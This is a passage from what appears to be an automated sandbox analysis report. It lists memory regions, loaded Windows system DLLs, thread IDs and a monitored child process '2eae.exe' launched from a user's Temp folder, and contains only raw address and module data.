"dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1892 start_va = 0x7ffa118b0000 end_va = 0x7ffa119affff monitored = 0 entry_point = 0x7ffa118f0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1893 start_va = 0x7ffa11a40000 end_va = 0x7ffa11a4bfff monitored = 0 entry_point = 0x7ffa11a42480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1894 start_va = 0x7ffa11b10000 end_va = 0x7ffa11b41fff monitored = 0 entry_point = 0x7ffa11b22340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1895 start_va = 0x7ffa11d80000 end_va = 0x7ffa11d8bfff monitored = 0 entry_point = 0x7ffa11d82790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1896 start_va = 0x7ffa11d90000 end_va = 0x7ffa11db3fff monitored = 0 entry_point = 0x7ffa11d93260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1897 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1898 start_va = 0x7ffa12080000 end_va = 0x7ffa120c8fff monitored = 0 entry_point = 0x7ffa1208a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1899 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1900 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1901 start_va = 0x7ffa122e0000 end_va = 0x7ffa12359fff monitored = 0 entry_point = 0x7ffa12301a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1902 start_va = 0x7ffa123a0000 end_va = 0x7ffa123d3fff monitored = 0 entry_point = 0x7ffa123bae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1903 start_va = 0x7ffa123e0000 end_va = 0x7ffa123e9fff monitored = 0 entry_point = 0x7ffa123e1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1904 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1905 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1906 start_va = 0x7ffa12710000 end_va = 0x7ffa12726fff monitored = 0 entry_point = 0x7ffa127179d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1907 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1908 start_va = 0x7ffa12870000 end_va = 0x7ffa12890fff monitored = 0 entry_point = 0x7ffa12880250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1909 start_va = 0x7ffa128c0000 end_va = 0x7ffa128f9fff monitored = 0 entry_point = 0x7ffa128c8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1910 start_va = 0x7ffa12900000 end_va = 0x7ffa12926fff monitored = 0 entry_point = 0x7ffa12910aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1911 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1912 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1913 start_va = 0x7ffa12c00000 end_va = 0x7ffa12c18fff monitored = 0 entry_point = 0x7ffa12c05e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1914 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1915 start_va = 0x7ffa12c50000 end_va = 0x7ffa12ce8fff monitored = 0 entry_point = 0x7ffa12c7f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1916 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1917 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1918 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1919 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1920 start_va = 0x7ffa12e20000 end_va = 0x7ffa12e74fff monitored = 0 entry_point = 0x7ffa12e37970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1921 start_va = 0x7ffa12e80000 end_va = 0x7ffa12f34fff monitored = 0 entry_point = 0x7ffa12ec22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1922 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1923 start_va = 0x7ffa13110000 end_va = 0x7ffa13126fff monitored = 0 entry_point = 0x7ffa13111390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1924 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1925 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1926 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1927 start_va = 0x7ffa133e0000 end_va = 0x7ffa13465fff monitored = 0 entry_point = 0x7ffa133ed8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1928 start_va = 0x7ffa13520000 end_va = 0x7ffa13b63fff monitored = 0 entry_point = 0x7ffa136e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1929 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1930 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1931 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1932 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1933 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1934 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1935 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1936 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1937 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1938 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1939 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1940 start_va = 0x7ffa14ba0000 end_va = 0x7ffa14bf1fff monitored = 0 entry_point = 0x7ffa14baf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1941 start_va = 0x7ffa14c00000 end_va = 0x7ffa15028fff monitored = 0 entry_point = 0x7ffa14c28740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1942 start_va = 0x7ffa15030000 end_va = 0x7ffa1508bfff monitored = 0 entry_point = 0x7ffa1504b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1943 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1944 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1945 start_va = 0x7ffa15210000 end_va = 0x7ffa1676efff monitored = 0 entry_point = 0x7ffa153711f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1946 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2129 start_va = 0x430000 end_va = 0x431fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 2130 start_va = 0x7df5ffb10000 end_va = 0x7df5ffeb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 2363 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2550 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3006 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3149 start_va = 0x7b80000 end_va = 0x7c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b80000" filename = "" Region: id = 3240 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 15262 start_va = 0x430000 end_va = 0x434fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 17753 start_va = 0x7c80000 end_va = 0x7d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c80000" filename = "" Thread: id = 52 os_tid = 0x13ec Thread: id = 53 os_tid = 0x13e8 Thread: id = 54 os_tid = 0xb54 Thread: id = 55 os_tid = 0xe58 Thread: id = 56 os_tid = 0xe4c Thread: id = 57 os_tid = 0xe24 Thread: id = 58 os_tid = 0x950 Thread: id = 59 os_tid = 0xa98 Thread: id = 60 os_tid = 0x7bc Thread: id = 61 os_tid = 0x260 Thread: id = 62 os_tid = 0x17c Thread: id = 63 os_tid = 0x664 Thread: id = 64 os_tid = 0x5d4 Thread: id = 65 os_tid = 0x5c4 Thread: id = 66 os_tid = 0x3ac Thread: id = 67 os_tid = 0x38c Thread: id = 68 os_tid = 0x39c Thread: id = 69 os_tid = 0x254 Thread: id = 70 os_tid = 0x8dc Thread: id = 71 os_tid = 0x440 Thread: id = 72 os_tid = 0x5e4 Thread: id = 73 os_tid = 0x93c Thread: id = 74 os_tid = 0x7f8 Thread: id = 75 os_tid = 0x3b0 Thread: id = 76 os_tid = 0xf4 Thread: id = 77 os_tid = 0x3a8 Thread: id = 78 os_tid = 0x370 Thread: id = 79 os_tid = 0x234 Thread: id = 80 os_tid = 0x230 Thread: id = 81 os_tid = 0x1d0 Thread: id = 82 os_tid = 0xbf4 Thread: id = 83 os_tid = 0xb6c Thread: id = 84 os_tid = 0xac4 Thread: id = 85 os_tid = 0xa14 Thread: id = 86 os_tid = 0xa10 Thread: id = 87 os_tid = 0xae4 Thread: id = 88 os_tid = 0x8b8 Thread: id = 89 os_tid = 0x7d4 Thread: id = 90 os_tid = 0x5ec Thread: id = 91 os_tid = 0x780 Thread: id = 92 os_tid = 0x728 Thread: id = 93 os_tid = 0x5e0 Thread: id = 94 os_tid = 0x508 Thread: id = 95 os_tid = 0x4f8 Thread: id = 96 os_tid = 0x7e4 Thread: id = 97 os_tid = 0x7dc Thread: id = 98 os_tid = 0x7d8 Thread: id = 99 os_tid = 0x7cc Thread: id = 100 os_tid = 0x788 Thread: id = 101 os_tid = 0x744 Thread: id = 102 os_tid = 0x448 Thread: id = 103 os_tid = 0x6f8 Thread: id = 104 os_tid = 0x6d4 Thread: id = 105 os_tid = 0x648 Thread: id = 106 os_tid = 0x640 Thread: id = 107 os_tid = 0x62c Thread: id = 108 os_tid = 0x530 Thread: id = 109 os_tid = 0x4a8 Thread: id = 110 os_tid = 0x2ac Thread: id = 111 os_tid = 0x270 Thread: id = 112 os_tid = 0x154 Thread: id = 113 os_tid = 0x1b8 Thread: id = 114 os_tid = 0x1bc Thread: id = 115 os_tid = 0x180 Thread: id = 116 os_tid = 0x188 Thread: id = 117 os_tid = 0x148 Thread: id = 118 os_tid = 0x12c Thread: id = 119 os_tid = 0xfc Thread: id = 120 os_tid = 0x60 Thread: id = 121 os_tid = 0x3f0 Thread: id = 122 os_tid = 0x3e8 Thread: id = 123 os_tid = 0x3cc Thread: id = 124 os_tid = 0x364 Thread: id = 170 os_tid = 0xd2c Thread: id = 183 os_tid = 0xc98 Process: id = "5" image_name = "2eae.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe" page_root = "0x714fe000" os_pid = "0x144" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x7b4" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2026 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2027 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2028 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2029 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2030 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2031 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2032 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2033 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2034 start_va = 0x400000 end_va = 0x472fff monitored = 1 entry_point = 0x40b380 region_type = mapped_file name = "2eae.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe") Region: id = 2035 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2036 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2037 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2038 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2039 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2040 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 2041 start_va = 0x480000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2042 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2043 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2044 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2045 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2046 start_va = 0x5f0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2047 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2048 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2049 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2050 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2051 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2052 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2053 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2054 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 2055 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2060 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2061 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2062 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2063 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2064 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2065 start_va = 0x540000 end_va = 0x569fff monitored = 0 entry_point = 0x545680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2066 start_va = 0x820000 end_va = 0x9a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 2067 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2068 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2069 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2070 start_va = 0x9b0000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 2071 start_va = 0xb40000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 2072 start_va = 0x1f40000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 2343 start_va = 0x6fa30000 end_va = 0x6fa35fff monitored = 0 entry_point = 0x6fa31490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 2344 start_va = 0x2140000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 2345 start_va = 0x550000 end_va = 0x552fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2350 start_va = 0x550000 end_va = 0x552fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2351 start_va = 0x550000 end_va = 0x579fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2352 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2353 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = 